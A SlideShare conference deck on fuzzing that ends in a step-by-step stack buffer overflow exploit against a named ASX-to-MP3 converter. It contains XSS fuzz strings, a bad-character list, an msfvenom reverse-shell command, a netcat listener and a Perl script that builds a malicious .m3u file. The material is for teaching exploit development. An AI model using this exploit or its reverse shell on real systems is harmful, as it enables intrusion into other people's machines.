SlideShare a Scribd company logo

Finding 0days at Arab Security Conference

R
Rodolpho Concurde

Fuzzing: Finding Your Own Bugs and 0days!

Technology
1 of 33
Download to read offline
Rodolpho Concurde (ROd0X) Information Security Consultant 1 Fuzzing: Finding Your Own Bugs and 0days!
$Whoami – Rodolpho Concurde (ROd0X)  Penetration Tester  Instructor I.T  Consultant of I.S – 13 years  EC-C|EH  Talks at Hack in the Box, MorterueloCON, Red Team Village, Stackconf, Bsides Athens & Bsides SATX.  Author Hakin9 Magazine: Stack Overfow, Pentest Magazine: Covert Channel, From Fuzzing to Get a Shell and From SEH Overwrite to Get a Shell.  https://www.linkedin.com/in/rodolphoconcurde  rconcurde@gmail.com 2
Agenda Fuzzing:  Types of targets;  Types of attacks;  Types of fuzzers;  Buffer Overfow;  PoC!! 3
Types of targets - Protocol: FTP, POP3, SMTP, Telnet, anyone! - Application: Any INPUT of any application. - File format: Any fle Format (.mp3, .m3u, mp4, …) for test the software’s reader! 4
Types of Attacks Fuzzers would try combinations of attacks on: - numbers - chars - metadata - pure binary sequences Is sent for the target one list with sequence of dangerous string. Example: (-999999999, alert`1`, top["al"+"ert"](1), <a href="data:text/html;base64_,<svg/onload=u0061&#x6C; &#101%72t(1)>">X</a, 11000001000010010001100). 5
Types of Fuzzers - Characteristics  Dumb: any string combination;  Smart fuzzing: Smart fuzzers are programmed with knowledge of the input format, i.e. a protocol defnition or rules for a fle format. - Mutation; -- Through replay and MITM or Proxy - Generation; - Evolutionary. Ref: https://www.f-secure.com/en/consulting/our-thinking/15-minute-guide-to-fuzzing 6
Buffer overfow Buffer overfow is an anomaly where a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory locations. Might be: Heap based: place in the memory which allocate lot amount of data and, dynamically; Stack based: Allocate a limited or fxed size of data, such as, data from local variables or functions. 7
B.0 Code Example int main(int argc, char *argv[]) { // Reserve 5 byte of buffer plus the terminating NULL. // To overflow, need more than 5 bytes... char buffer[5]; // If more than 5 characters input // by user, there will be access // violation, segmentation fault // a prompt how to execute the program... if (argc < 2) { printf("strcpy() NOT executed....n"); printf("Syntax: %s <characters>n", argv[0]); exit(0); } ……………………... 8
9
PoC Discovery INPUT format to realize the fuzz. Example of the protocol POP3 - https://tools.ietf.org/rfc/rfc1081.txt 10
PoC Vulnerable software to download: https://www.exploit-db.com/apps/02fffa94e55f73bb2e467810fcad09f7- yahoopops-win-0.6.exe 11
PoC 12
PoC Vul software to File Format Fuzzing! http://s2.download.net.pl/ASX-to-MP3-Converter-4063-6400-5319.exe Opening in Immunityy Debugger the software in: File -> Attach -> ASX2MP3Converter and Run the same with F9 13
PoC Image demonstrated below, show the code used to fuzzing the vulnerable software. Sending to the INPUT of the software the String reached in variable [$buffer]. The value of variable [$buffer] can be generated utilizing the tool of Metasploit pattern_create. 14
PoC Compiling the code with the command [perl asx2mp3.pl] After, load the fle p0c.m3u in vul software, run the same in Immunity Debugger. And we have a Stack Overfow! 15
PoC The next step is utilize the pattern_offset to localize the Offset of EIP. 16
PoC In Debugger, we make use of mona.py for see the modules utilized by the vulnerable software. We need to fnd a address that make a JUMP from EIP to ESP, for in ESP we put our shellcode. Let’s search some module that make JUMP ESP, frst let’s see the modules. For this we will use the mona.py script: https://raw.githubusercontent.com/corelan/mona/master/mona.py You should make download of mona.py and paste at: c:Program FilesImmunity IncImmunity DebuggerPyCommands Let’s use the mona! Type in command bar of Immunity: !mona modules We should fnd a module without mechanisms of protection. 17
PoC Next step is fnd inside of msvos module, some expression that make a Jump to the ESP Register; for this, frst we should obtain the assembly value referent the JMP ESP. Now, the mona command to fnd this expression. 18
PoC From this command is fnd the address 0x01ba135b, and it we should insert in following exploit code. 19
PoC Now we need to search for bad characters, depending on the application, type of vulnerability and protocols in use, may be certain characters which are considered "bad" and should not be used in your buffer or shellcode. One example of bad characters is 0x00. This character is considered bad because a null byte is also used to terminate a string copy operation, which would truncate our buffer whenever which the null byte appears. For test if has more badchars in the software, close the software and the Immunity, and reopen the Immunity and attach the software in the Immunity again. 20
PoC We will send the string bellow inside of our exploit code. "x01x02x03x04x05x06x07x08x09x0ax0bx0cx0dx0ex0fx10" "x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20" "x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30" "x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3fx40" "x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50" "x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5fx60" "x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70" "x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7fx80" "x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90" "x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0" "xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0" "xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0" "xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0" "xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0" "xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0" "xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff". 21
PoC Sending badchars against the target! 22
PoC In Immunity, give a click with right-button in ESP and click in Follow in Dump. 23
PoC Dump of memory with badchars. 24
PoC The character 0x00 and 0x0a we won’t send, because we already know that it is a badchars and, for this, generate error in the software. Our exploit code is like image below! We add variable badchars. 25
PoC Dump of memory without badchar x0a. 26
PoC Setted a Breakpoint in EIP address with a double-click we see the fow of execution stop in the address chosen. For last, let’s generate our shellcode with the msfvenom tool and introduce it in exploit code. 27
PoC 28
PoC Load the new malicious fle inside ASX2MP3. 29
PoC nc –lvvp 5555 - > to listen in a TCP port 5555 And we got a shell :) 30
Exploit Code #!/usr/bin/perl my $buffsize = 50000; my $junk = "x41" x 35056; my $eip = "x5bx13xbax01"; my $nops = "x90" x 10; # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.43.114 LPORT=5555 -f perl -e x86/shikata_ga_nai -b "x0ax00" my $shell = "xdaxc2xf2xe7x42xdaxccxd9x74x24xf4x58x33xc9" . "xb1x52x31x70x12x83xc0x04x03xb2xfcx05xb7xce" . …. Shelllcode …. . "x38xa2x9exb7x3dxeex18x24x4cx7fxcdx4axe3x80" . "xba"; my $sploit = $junk.$eip.$nops.$shell; my $fll = "x43" x ($buffsize - (length($sploit))); my $buffer = $sploit.$fll; # write the exploit buffer to fle my $fle = "p0c.m3u"; open (FILE, ">$fle"); print FILE $buffer; close(FILE); print "Exploit fle created [" . $fle . "]n"; print "Buffer size: ". length($buffer) . "n"; 31
Questions?? 32
33 Thanks

Recommended

From SEH Overwrite with Egg Hunter to Get a Shell!
From SEH Overwrite with Egg Hunter to Get a Shell!From SEH Overwrite with Egg Hunter to Get a Shell!
From SEH Overwrite with Egg Hunter to Get a Shell!Rodolpho Concurde
 
Fuzzing: Finding Your Own Bugs and 0days! 2.0
Fuzzing: Finding Your Own Bugs and 0days! 2.0Fuzzing: Finding Your Own Bugs and 0days! 2.0
Fuzzing: Finding Your Own Bugs and 0days! 2.0Rodolpho Concurde
 
Code Vulnerabilities & Attacks
Code Vulnerabilities & AttacksCode Vulnerabilities & Attacks
Code Vulnerabilities & AttacksMarcus Botacin
 
Wtf per lineofcode
Wtf per lineofcodeWtf per lineofcode
Wtf per lineofcodeDavid Gómez García
 
Software Vulnerabilities in C and C++ (CppCon 2018)
Software Vulnerabilities in C and C++ (CppCon 2018)Software Vulnerabilities in C and C++ (CppCon 2018)
Software Vulnerabilities in C and C++ (CppCon 2018)Patricia Aas
 
Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)Patricia Aas
 
Ricardo J. Rodríguez & Daniel Uroz - When ROP meets Turing: Automatic Generat...
Ricardo J. Rodríguez & Daniel Uroz - When ROP meets Turing: Automatic Generat...Ricardo J. Rodríguez & Daniel Uroz - When ROP meets Turing: Automatic Generat...
Ricardo J. Rodríguez & Daniel Uroz - When ROP meets Turing: Automatic Generat...RootedCON
 
Rust LDN 24 7 19 Oxidising the Command Line
Rust LDN 24 7 19 Oxidising the Command LineRust LDN 24 7 19 Oxidising the Command Line
Rust LDN 24 7 19 Oxidising the Command LineMatt Provost
 

Recommended

From SEH Overwrite with Egg Hunter to Get a Shell!
From SEH Overwrite with Egg Hunter to Get a Shell!From SEH Overwrite with Egg Hunter to Get a Shell!
From SEH Overwrite with Egg Hunter to Get a Shell!Rodolpho Concurde
 
Fuzzing: Finding Your Own Bugs and 0days! 2.0
Fuzzing: Finding Your Own Bugs and 0days! 2.0Fuzzing: Finding Your Own Bugs and 0days! 2.0
Fuzzing: Finding Your Own Bugs and 0days! 2.0Rodolpho Concurde
 
Code Vulnerabilities & Attacks
Code Vulnerabilities & AttacksCode Vulnerabilities & Attacks
Code Vulnerabilities & AttacksMarcus Botacin
 
Wtf per lineofcode
Wtf per lineofcodeWtf per lineofcode
Wtf per lineofcodeDavid Gómez García
 
Software Vulnerabilities in C and C++ (CppCon 2018)
Software Vulnerabilities in C and C++ (CppCon 2018)Software Vulnerabilities in C and C++ (CppCon 2018)
Software Vulnerabilities in C and C++ (CppCon 2018)Patricia Aas
 
Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)Patricia Aas
 
Ricardo J. Rodríguez & Daniel Uroz - When ROP meets Turing: Automatic Generat...
Ricardo J. Rodríguez & Daniel Uroz - When ROP meets Turing: Automatic Generat...Ricardo J. Rodríguez & Daniel Uroz - When ROP meets Turing: Automatic Generat...
Ricardo J. Rodríguez & Daniel Uroz - When ROP meets Turing: Automatic Generat...RootedCON
 
Rust LDN 24 7 19 Oxidising the Command Line
Rust LDN 24 7 19 Oxidising the Command LineRust LDN 24 7 19 Oxidising the Command Line
Rust LDN 24 7 19 Oxidising the Command LineMatt Provost
 
The bytecode hocus pocus - JavaOne 2016
The bytecode hocus pocus - JavaOne 2016The bytecode hocus pocus - JavaOne 2016
The bytecode hocus pocus - JavaOne 2016Raimon Ràfols
 
Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]RootedCON
 
Exploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterExploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterAjin Abraham
 
07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W mattersAlexandre Moneger
 
Linux Shellcode disassembling
Linux Shellcode disassemblingLinux Shellcode disassembling
Linux Shellcode disassemblingHarsh Daftary
 
The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)Patricia Aas
 
Secure coding for developers
Secure coding for developersSecure coding for developers
Secure coding for developerssluge
 
The Anatomy of an Exploit (CPPP 2019)
The Anatomy of an Exploit (CPPP 2019)The Anatomy of an Exploit (CPPP 2019)
The Anatomy of an Exploit (CPPP 2019)Patricia Aas
 
Tetcon2016 160104
Tetcon2016 160104Tetcon2016 160104
Tetcon2016 160104Bordeaux I
 
Chromium Sandbox on Linux (BlackHoodie 2018)
Chromium Sandbox on Linux (BlackHoodie 2018)Chromium Sandbox on Linux (BlackHoodie 2018)
Chromium Sandbox on Linux (BlackHoodie 2018)Patricia Aas
 
¡Ups! código inseguro: detección, explotación y mitigación de vulnerabilidade...
¡Ups! código inseguro: detección, explotación y mitigación de vulnerabilidade...¡Ups! código inseguro: detección, explotación y mitigación de vulnerabilidade...
¡Ups! código inseguro: detección, explotación y mitigación de vulnerabilidade...Software Guru
 
An introduction to PHP 5.4
An introduction to PHP 5.4An introduction to PHP 5.4
An introduction to PHP 5.4Giovanni Derks
 
Ethical hacking with Python tools
Ethical hacking with Python toolsEthical hacking with Python tools
Ethical hacking with Python toolsJose Manuel Ortega Candel
 
Introduction to Memory Exploitation (CppEurope 2021)
Introduction to Memory Exploitation (CppEurope 2021)Introduction to Memory Exploitation (CppEurope 2021)
Introduction to Memory Exploitation (CppEurope 2021)Patricia Aas
 
Understand study
Understand studyUnderstand study
Understand studyAntonio Costa aka Cooler_
 
Ein Stall voller Trüffelschweine - (PHP-)Profiling-Tools im Überblick
Ein Stall voller Trüffelschweine - (PHP-)Profiling-Tools im ÜberblickEin Stall voller Trüffelschweine - (PHP-)Profiling-Tools im Überblick
Ein Stall voller Trüffelschweine - (PHP-)Profiling-Tools im Überblickrenebruns
 
Handling Exceptions In C &amp; C++[Part A]
Handling Exceptions In C &amp; C++[Part A]Handling Exceptions In C &amp; C++[Part A]
Handling Exceptions In C &amp; C++[Part A]ppd1961
 
0d1n
0d1n0d1n
0d1nAntonio Costa aka Cooler_
 
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練Sheng-Hao Ma
 
Reading Other Peoples Code (Web Rebels 2018)
Reading Other Peoples Code (Web Rebels 2018)Reading Other Peoples Code (Web Rebels 2018)
Reading Other Peoples Code (Web Rebels 2018)Patricia Aas
 
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!NETWAYS
 
From SEH Overwrite with Egg Hunter to Get a Shell_by_RodolphoConcurde
From SEH Overwrite with Egg Hunter to Get a Shell_by_RodolphoConcurdeFrom SEH Overwrite with Egg Hunter to Get a Shell_by_RodolphoConcurde
From SEH Overwrite with Egg Hunter to Get a Shell_by_RodolphoConcurdeRodolpho Concurde
 

More Related Content

What's hot

The bytecode hocus pocus - JavaOne 2016
The bytecode hocus pocus - JavaOne 2016The bytecode hocus pocus - JavaOne 2016
The bytecode hocus pocus - JavaOne 2016Raimon Ràfols
 
Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]RootedCON
 
Exploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterExploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterAjin Abraham
 
07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W mattersAlexandre Moneger
 
Linux Shellcode disassembling
Linux Shellcode disassemblingLinux Shellcode disassembling
Linux Shellcode disassemblingHarsh Daftary
 
The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)Patricia Aas
 
Secure coding for developers
Secure coding for developersSecure coding for developers
Secure coding for developerssluge
 
The Anatomy of an Exploit (CPPP 2019)
The Anatomy of an Exploit (CPPP 2019)The Anatomy of an Exploit (CPPP 2019)
The Anatomy of an Exploit (CPPP 2019)Patricia Aas
 
Tetcon2016 160104
Tetcon2016 160104Tetcon2016 160104
Tetcon2016 160104Bordeaux I
 
Chromium Sandbox on Linux (BlackHoodie 2018)
Chromium Sandbox on Linux (BlackHoodie 2018)Chromium Sandbox on Linux (BlackHoodie 2018)
Chromium Sandbox on Linux (BlackHoodie 2018)Patricia Aas
 
¡Ups! código inseguro: detección, explotación y mitigación de vulnerabilidade...
¡Ups! código inseguro: detección, explotación y mitigación de vulnerabilidade...¡Ups! código inseguro: detección, explotación y mitigación de vulnerabilidade...
¡Ups! código inseguro: detección, explotación y mitigación de vulnerabilidade...Software Guru
 
An introduction to PHP 5.4
An introduction to PHP 5.4An introduction to PHP 5.4
An introduction to PHP 5.4Giovanni Derks
 
Introduction to Memory Exploitation (CppEurope 2021)
Introduction to Memory Exploitation (CppEurope 2021)Introduction to Memory Exploitation (CppEurope 2021)
Introduction to Memory Exploitation (CppEurope 2021)Patricia Aas
 
Ein Stall voller Trüffelschweine - (PHP-)Profiling-Tools im Überblick
Ein Stall voller Trüffelschweine - (PHP-)Profiling-Tools im ÜberblickEin Stall voller Trüffelschweine - (PHP-)Profiling-Tools im Überblick
Ein Stall voller Trüffelschweine - (PHP-)Profiling-Tools im Überblickrenebruns
 
Handling Exceptions In C &amp; C++[Part A]
Handling Exceptions In C &amp; C++[Part A]Handling Exceptions In C &amp; C++[Part A]
Handling Exceptions In C &amp; C++[Part A]ppd1961
 
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練Sheng-Hao Ma
 
Reading Other Peoples Code (Web Rebels 2018)
Reading Other Peoples Code (Web Rebels 2018)Reading Other Peoples Code (Web Rebels 2018)
Reading Other Peoples Code (Web Rebels 2018)Patricia Aas
 

What's hot (20)

The bytecode hocus pocus - JavaOne 2016
The bytecode hocus pocus - JavaOne 2016The bytecode hocus pocus - JavaOne 2016
The bytecode hocus pocus - JavaOne 2016
 
Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]
 
Exploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterExploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 Egghunter
 
07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters
 
Linux Shellcode disassembling
Linux Shellcode disassemblingLinux Shellcode disassembling
Linux Shellcode disassembling
 
The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)
 
Secure coding for developers
Secure coding for developersSecure coding for developers
Secure coding for developers
 
The Anatomy of an Exploit (CPPP 2019)
The Anatomy of an Exploit (CPPP 2019)The Anatomy of an Exploit (CPPP 2019)
The Anatomy of an Exploit (CPPP 2019)
 
Tetcon2016 160104
Tetcon2016 160104Tetcon2016 160104
Tetcon2016 160104
 
Chromium Sandbox on Linux (BlackHoodie 2018)
Chromium Sandbox on Linux (BlackHoodie 2018)Chromium Sandbox on Linux (BlackHoodie 2018)
Chromium Sandbox on Linux (BlackHoodie 2018)
 
¡Ups! código inseguro: detección, explotación y mitigación de vulnerabilidade...
¡Ups! código inseguro: detección, explotación y mitigación de vulnerabilidade...¡Ups! código inseguro: detección, explotación y mitigación de vulnerabilidade...
¡Ups! código inseguro: detección, explotación y mitigación de vulnerabilidade...
 
An introduction to PHP 5.4
An introduction to PHP 5.4An introduction to PHP 5.4
An introduction to PHP 5.4
 
Ethical hacking with Python tools
Ethical hacking with Python toolsEthical hacking with Python tools
Ethical hacking with Python tools
 
Introduction to Memory Exploitation (CppEurope 2021)
Introduction to Memory Exploitation (CppEurope 2021)Introduction to Memory Exploitation (CppEurope 2021)
Introduction to Memory Exploitation (CppEurope 2021)
 
Understand study
Understand studyUnderstand study
Understand study
 
Ein Stall voller Trüffelschweine - (PHP-)Profiling-Tools im Überblick
Ein Stall voller Trüffelschweine - (PHP-)Profiling-Tools im ÜberblickEin Stall voller Trüffelschweine - (PHP-)Profiling-Tools im Überblick
Ein Stall voller Trüffelschweine - (PHP-)Profiling-Tools im Überblick
 
Handling Exceptions In C &amp; C++[Part A]
Handling Exceptions In C &amp; C++[Part A]Handling Exceptions In C &amp; C++[Part A]
Handling Exceptions In C &amp; C++[Part A]
 
0d1n
0d1n0d1n
0d1n
 
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
 
Reading Other Peoples Code (Web Rebels 2018)
Reading Other Peoples Code (Web Rebels 2018)Reading Other Peoples Code (Web Rebels 2018)
Reading Other Peoples Code (Web Rebels 2018)
 

Similar to Finding 0days at Arab Security Conference

stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!NETWAYS
 
From SEH Overwrite with Egg Hunter to Get a Shell_by_RodolphoConcurde
From SEH Overwrite with Egg Hunter to Get a Shell_by_RodolphoConcurdeFrom SEH Overwrite with Egg Hunter to Get a Shell_by_RodolphoConcurde
From SEH Overwrite with Egg Hunter to Get a Shell_by_RodolphoConcurdeRodolpho Concurde
 
From printed circuit boards to exploits
From printed circuit boards to exploitsFrom printed circuit boards to exploits
From printed circuit boards to exploitsvirtualabs
 
Writing simple buffer_overflow_exploits
Writing simple buffer_overflow_exploitsWriting simple buffer_overflow_exploits
Writing simple buffer_overflow_exploitsD4rk357 a
 
Buffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the StackBuffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the StackironSource
 
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisChong-Kuan Chen
 
Adventures in Asymmetric Warfare
Adventures in Asymmetric WarfareAdventures in Asymmetric Warfare
Adventures in Asymmetric WarfareWill Schroeder
 
Buffer overflow – Smashing The Stack
Buffer overflow – Smashing The StackBuffer overflow – Smashing The Stack
Buffer overflow – Smashing The StackTomer Zait
 
NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016Mikhail Sosonkin
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityIOSR Journals
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Pluginsamiable_indian
 
05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR mattersAlexandre Moneger
 
Who pulls the strings?
Who pulls the strings?Who pulls the strings?
Who pulls the strings?Ronny
 
Analysis of Godot Engine's Source Code
Analysis of Godot Engine's Source CodeAnalysis of Godot Engine's Source Code
Analysis of Godot Engine's Source CodePVS-Studio
 
100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects 100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects Andrey Karpov
 
Dive into exploit development
Dive into exploit developmentDive into exploit development
Dive into exploit developmentPayampardaz
 
Security & ethical hacking
Security & ethical hackingSecurity & ethical hacking
Security & ethical hackingAmanpreet Singh
 
Code Red Security
Code Red SecurityCode Red Security
Code Red SecurityAmr Ali
 

Similar to Finding 0days at Arab Security Conference (20)

stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
 
From SEH Overwrite with Egg Hunter to Get a Shell_by_RodolphoConcurde
From SEH Overwrite with Egg Hunter to Get a Shell_by_RodolphoConcurdeFrom SEH Overwrite with Egg Hunter to Get a Shell_by_RodolphoConcurde
From SEH Overwrite with Egg Hunter to Get a Shell_by_RodolphoConcurde
 
From printed circuit boards to exploits
From printed circuit boards to exploitsFrom printed circuit boards to exploits
From printed circuit boards to exploits
 
Writing simple buffer_overflow_exploits
Writing simple buffer_overflow_exploitsWriting simple buffer_overflow_exploits
Writing simple buffer_overflow_exploits
 
Buffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the StackBuffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the Stack
 
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
 
Adventures in Asymmetric Warfare
Adventures in Asymmetric WarfareAdventures in Asymmetric Warfare
Adventures in Asymmetric Warfare
 
Buffer overflow – Smashing The Stack
Buffer overflow – Smashing The StackBuffer overflow – Smashing The Stack
Buffer overflow – Smashing The Stack
 
NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016
 
Exploiting buffer overflows
Exploiting buffer overflowsExploiting buffer overflows
Exploiting buffer overflows
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utility
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
 
05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters
 
Buffer Overflow Attacks
Buffer Overflow AttacksBuffer Overflow Attacks
Buffer Overflow Attacks
 
Who pulls the strings?
Who pulls the strings?Who pulls the strings?
Who pulls the strings?
 
Analysis of Godot Engine's Source Code
Analysis of Godot Engine's Source CodeAnalysis of Godot Engine's Source Code
Analysis of Godot Engine's Source Code
 
100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects 100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects
 
Dive into exploit development
Dive into exploit developmentDive into exploit development
Dive into exploit development
 
Security & ethical hacking
Security & ethical hackingSecurity & ethical hacking
Security & ethical hacking
 
Code Red Security
Code Red SecurityCode Red Security
Code Red Security
 

Recently uploaded

Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
